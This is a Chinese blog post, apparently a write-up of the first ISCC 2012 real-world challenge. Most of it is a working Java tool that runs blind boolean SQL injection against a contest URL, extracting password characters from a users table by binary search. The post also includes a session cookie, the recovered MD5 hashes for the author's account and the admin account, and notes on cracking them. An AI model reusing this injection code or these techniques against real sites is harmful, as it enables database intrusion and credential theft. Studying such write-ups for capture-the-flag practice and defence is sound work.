ISCC 2012 真实关首先题

2012-08-15

ISCC 2012 真实关第一题第一天：整个网站，没有什么思路，无从下手的感觉，拿wwwscan一顿狂扫，发现很多目录都

ISCC 2012 真实关第一题

第一天：

整个网站，没有什么思路，无从下手的感觉，拿wwwscan一顿狂扫，发现很多目录都是403，可能是做了IP限制，扫到一个叫做htaccess，下下来发现是一些转跳的

规则，和一些防下载防列目录的规则，从中找到了服务器的架构 Apache/PHP/Drupal 百度了一下，也没有什么可利用的漏洞。

趁机学习了一下，htaccess的配制方法，先把扫到的文件内容粘上了。

教程在这http://hi.baidu.com/wojiubaibudu/item/4b3513c74a8fe47aced4f817

注释占了很多，一些简单的功能注释已经说的很明白了，主要看一下URL重定向的设置，这的功能比较强大。

规则是所有符合RewriteCond规则的URL都会被重定向到，RewriteRule的地址

正则表达式是个非常蛋疼的东西，可是很多时候会用到。

教程的话看这个http://manual.phpv.net/regular_expression.html

总结一下常用的几个符号

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;import java.net.HttpURLConnection;import java.net.URL;public class injecter{private static String cutrentString;private static String KEY="admin";private static String[] Tables={"name","pass","mail","time"};private static String  tableName = "users"; private static String  columnName = "pass";private static String userName = "wyl091256";private static char[] columnValues = new char[33];private static class injecterThead extends Thread{private static int index;public injecterThead(int index){this.index=index;}private int midFinder(int index,int start,int end)  throws Exception{int mid = (start+end)/2;//System.out.println("Finder:"+start+" "+end);if (start==end) return mid;if (start==mid){if (tryURLConnection(end,index))return start;else return end;}if (tryURLConnection(mid,index))     //符号是小于return midFinder(index,start,mid-1);elsereturn midFinder(index,mid,end);}private boolean check(String str){return (str.indexOf(KEY)!=-1);}private String injectionURL(int num,int index){return "%20and%20(select%20count(*)%20from%20"+ tableName +   "%20where%20name='"+userName+"'" +   "%20and%20ascii(substring("+columnName+","+index+",1))%3c"+num+")%3E0";}private boolean tryURLConnection(int num,int index) throws Exception{cutrentString="";InputStream inputStream;String strURL = "http://www.isclab.org/contest/challenge/passlog/1"+injectionURL(num,index);URL url = new URL(strURL);//System.out.println(strURL);HttpURLConnection connection=(HttpURLConnection)url.openConnection();connection.setRequestProperty("Pragma","No-Cache");connection.setRequestProperty("Expires","0");connection.setRequestProperty("Cache-Control","no-cache");connection.setRequestProperty("Cookie","SESSa2a57b4294507a5753fc449b43b9af6e=11207d61c69c44087266b34bc782808c");connection.setRequestProperty("accept", "textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); connection.setRequestProperty("Accept-Encoding","gzip, deflate");connection.setRequestProperty("Accept-Language","zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3");connection.setRequestProperty("Connection","keep-alive");connection.setRequestProperty("Host","xscj.hit.edu.cn");connection.setRequestProperty("Referer","http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx.asp");connection.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0");connection.setConnectTimeout(3000);connection.setDoOutput(true);connection.setDoInput(true);connection.setUseCaches(false);connection.connect();inputStream=connection.getInputStream();BufferedReader bufferedReader=new BufferedReader(new InputStreamReader(inputStream,"utf-8"));while((cutrentString=bufferedReader.readLine())!=null){//System.out.println(cutrentString);if (check(cutrentString)){inputStream.close();connection.disconnect();//System.out.println("True");return true;}}inputStream.close();connection.disconnect();//System.out.println("False");return false;}private void runColumnValue() throws Exception{int index=1;String value="";while (true){char c=(char)midFinder(index,0,256);if (c==' ' || (int)c==0 || index==32) break;System.out.println(c);value+=c;index++;}System.out.println(index);}@Overridepublic void run (){try{columnValues[index]=(char)midFinder(index,0,256);System.out.println(index+":"+(int)columnValues[index]);}catch(Exception e){System.out.println("InitErroe:"+e.getMessage());injecterThead it = new injecterThead(index);it.run();this.stop();}}}public static void main(String args[]){for(int i=1;i<=32;i++){injecterThead it = new injecterThead(i);it.run();}}}

很快跑出了我自己的MD5密码和admin的MD5密码

wyl091256

97faf8f61ca07a06f7bb999737158d4c

admin

a9976616854716aa043537627d2f32f3

第五天：

艰苦的破解MD5之旅，很多复杂的密码都无法破解，不过简单的可以在在线网站上得到。

有一个叫做彩虹表的东西貌似很强大。不过因为有几百G没有下载，再次留个坑。

到这里破解第一关的蛋疼之旅就基本结束了。

热点排行

互联网

ISCC 2012 真实关首先题